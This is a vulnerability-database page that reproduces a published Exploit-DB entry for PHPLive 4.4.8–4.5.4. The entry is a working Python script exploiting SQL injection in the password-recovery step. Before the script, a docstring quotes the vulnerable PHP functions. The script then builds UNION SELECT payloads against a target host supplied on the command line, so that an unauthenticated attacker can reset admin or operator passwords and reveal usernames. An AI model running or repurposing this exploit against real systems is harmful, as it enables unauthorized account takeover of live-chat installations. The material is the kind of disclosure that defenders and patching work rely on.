Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

PHPLive 4.4.8 < 4.5.4 - Password Recovery SQL Injection

🗓️ 15 Jun 2016 00:00:00Reported by Tiago CarvalhoType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 26 Views

PHP 4.4.8-4.5.4 Password Recovery SQL Injection vulnerability in Phplive. Exploit allows resetting password and revealing usernames without authentication

Code
#!/bin/env python
################################################################################################
# Exploit title: Password Recovery Sql Injection
# Exploit Author: Tiago Carvalho
# Vendor Homepage: http://www.phplivesupport.com/?plk=osicodes-5-ykq-m
# Version : 4.4.8 - 4.5.4
# Product Name: Phplive
# Tested on: Debian \ Kali linux 2016-1
################################################################################################
"""
Their are multiple sql injection vunlerabilities in this product.
The exploit uses the sql injection vulnerability on the last step of the password recovery process
and force the application to rest the password and show the username, without requiring authentication
or to ever execute the first step, the vulnerability allows the recovery of both admin and operator.

Vulnerable code location: API/Setup/get.php
The filtering in place allows alphanumeric and restricts the use of serveral special chars,
its use of mysql escape functions and stripslashes are bypassed by since theirs no need to inject
special char to create a valid statement. 

FUNCTION Setup_get_InfoByID( &$dbh,
					$adminid )
	{
		if ( $adminid == "" )
			return false ;

		LIST( $adminid ) = database_mysql_quote( $dbh, $adminid ) ;

		$query = "SELECT * FROM p_admins WHERE adminID = $adminid LIMIT 1" ;
		database_mysql_query( $dbh, $query ) ;

		if ( $dbh[ 'ok' ] )
		{
			$data = database_mysql_fetchrow( $dbh ) ;
			return $data ;
		}
		return false ;
	}

Vulnerable code location: /API/Ops/get.php

FUNCTION Ops_get_OpInfoByID( &$dbh,
					$opid )
	{
		if ( $opid == "" )
			return false ;

		LIST( $opid ) = database_mysql_quote( $dbh, $opid ) ;

		$query = "SELECT * FROM p_operators WHERE opID = $opid LIMIT 1" ;
		database_mysql_query( $dbh, $query ) ;

		if ( $dbh[ 'ok' ] )
		{
			$data = database_mysql_fetchrow( $dbh ) ;
			return $data ;
		}
		return false ;
	}


"""

import re
import urllib2
import md5
import string
import argparse

match = re.compile(r"<div\sclass=\"edit_title\".*?>(.*)</div>", re.MULTILINE)


server_url = "localhost/phplive"

def build_payload(host, sql, search_exp, target, last_active, passwd):
	req_url = "http://%s/index.php%s"
	url_params = "?v=%s&%s=0+%s"
	str = sql % (last_active, passwd, search_exp)
	pwd_verify = md5.new("%d%d" % (last_active,passwd)).hexdigest() 
	url_params = url_params % (pwd_verify,target,str)
	return req_url % (host, url_params)

def exploit(host, admin, last_active, passwd):
	if admin:
		target="adminid"
		sql = "union+all+select+adminid,created,%d,status,ses,login,%d,email+from+p_admins+where+login+like+%s25"
	else:
		target="opid"
		sql = "union+all+select+opid,%d,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,login,%d,0,0,0,0,0,0+from+p_operators+where+login+like+%s25"
	char_list = list(string.ascii_letters)
	for char in char_list:
		payload = build_payload(host, sql, hex(ord(char)), target=target, last_active=last_active, passwd=passwd)
		request = urllib2.urlopen(payload)
		if request.code == 200:
			html = request.read()
			result = match.findall(html)
			if len(result) == 2 and result[1]:
				print "[*]\tSUCCESS!!!!!"
				print "[*]\t%s %s" %  (re.sub("<span.*?>|</span>","",result[0]), result[1])
				break				
		
# exploit(server_url, admin=False, last_active=1, passwd=1)

if __name__ == '__main__':
	admin = True
	parser = argparse.ArgumentParser(description='PhpLive 4.4.8 Password Recovery Sql injection Exploit')
	parser.add_argument("-u", "--url", help="url host|ipaddress/path eg: localhost/phplive")
	parser.add_argument("-o", "--operator", help="Execute operators password reset", action="store_true")
	parser.add_argument("-l", "--lastactive", help="Last active date (int)", type=int, default=0)	
	parser.add_argument("-p", "--passwd", help="Password (int)", type=int, default=0)	
	
	args = parser.parse_args()
	if args.operator:
		print "[*]\toperator password reset"
		admin = False
	
	exploit(args.url, admin, args.lastactive, args.passwd)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 Jun 2016 00:00Current
7.4High risk
Vulners AI Score7.4
phppassword recoverysql injectionphplive
26